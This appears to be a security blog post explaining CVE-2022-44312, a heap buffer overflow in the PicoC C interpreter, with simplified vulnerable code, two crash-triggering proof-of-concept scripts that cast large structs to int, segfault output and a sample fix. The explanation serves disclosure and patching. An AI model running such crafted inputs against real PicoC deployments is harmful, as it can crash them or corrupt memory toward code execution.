---

The security community continues to find critical bugs in even the smallest tools used by programmers and engineers. One such tool is PicoC, a small C interpreter for scripting and rapid development. In this post, we dig into CVE-2022-44312, a serious heap buffer overflow vulnerability, explain its root cause, show a code example, and provide useful links to official sources. If you’re a C developer or use embedded tools, this is for you.

What is PicoC?

PicoC is a minimal C interpreter mainly designed for embedded use. You can feed it C code directly, and it quickly interprets and runs it, making it popular in lightweight and resource-constrained environments.

What’s CVE-2022-44312?

CVE-2022-44312 is a heap buffer overflow in PicoC version 3.2.2. The vulnerability is located in the ExpressionCoerceInteger function (file: expression.c), which can be reached through a chain starting from ExpressionInfixOperator. This bug could allow a crafted input, run via PicoC, to corrupt memory and run code of the attacker's choice.

Security Impact:  
Heap buffer overflows often let attackers execute arbitrary code, crash the interpreter, or escalate privileges — depending on how the software is executed.

The Vulnerable Function

// expression.c (simplified)
void ExpressionCoerceInteger(Picoc *pc, struct Value *val) {
    if (val->Typ->Base != TypeInteger) {
        struct Value *NewVal = VariableAllocValueAndData(pc, sizeof(int), false, NULL, false);
        // ... copy over data ...
        memcpy(NewVal->Val, val->Val, val->Typ->Sizeof);
        // ... rest of function ...
    }
}

The memcpy uses val->Typ->Sizeof as the length. If Sizeof is greater than sizeof(int) (for example, passed a custom or malformed type), memcpy will write past the end of the allocated memory and corrupt the heap.

Suppose an attacker supplies malicious C code to be interpreted

// Attacker's payload for PicoC
struct Big {
    char a[64];
};

struct Big big = { "AAAAAAAA...BBBBBBBBBCCCCCCCCCDDDDDDDD" }; // crafted pattern
int b = (int) big; // Triggers ExpressionCoerceInteger on a 64-byte struct

Heap overflow occurs, writing up to 64 bytes into a buffer sized for an int (usually 4 bytes).

This can smash heap metadata or variables, leading to code execution (with the right heap layout).

Here’s a test case to cause a crash (real exploits require more heap manipulation)

// crash_picoc.c
struct Over {
    char data[128];
};

struct Over o = { "AAAABBBBCCCCDDDDEEEEFFFFGGGHHHHIHJKLMN" };
int i = (int)o; // Will invoke ExpressionCoerceInteger and overflow!

On running this in PicoC v3.2.2

$ picoc crash_picoc.c
Segmentation fault (core dumped)

Official References

- NVD Entry for CVE-2022-44312
- PicoC Source Code & Issues
- GitHub Advisory Database Entry

Sample fix

if (val->Typ->Sizeof > sizeof(int)) {
    // error! or clamp to sizeof(int)
}
memcpy(NewVal->Val, val->Val, 
       val->Typ->Sizeof > sizeof(int) ? sizeof(int) : val->Typ->Sizeof);

Timeline

Published on: 11/08/2022 15:15:00 UTC
Last modified on: 11/08/2022 21:55:00 UTC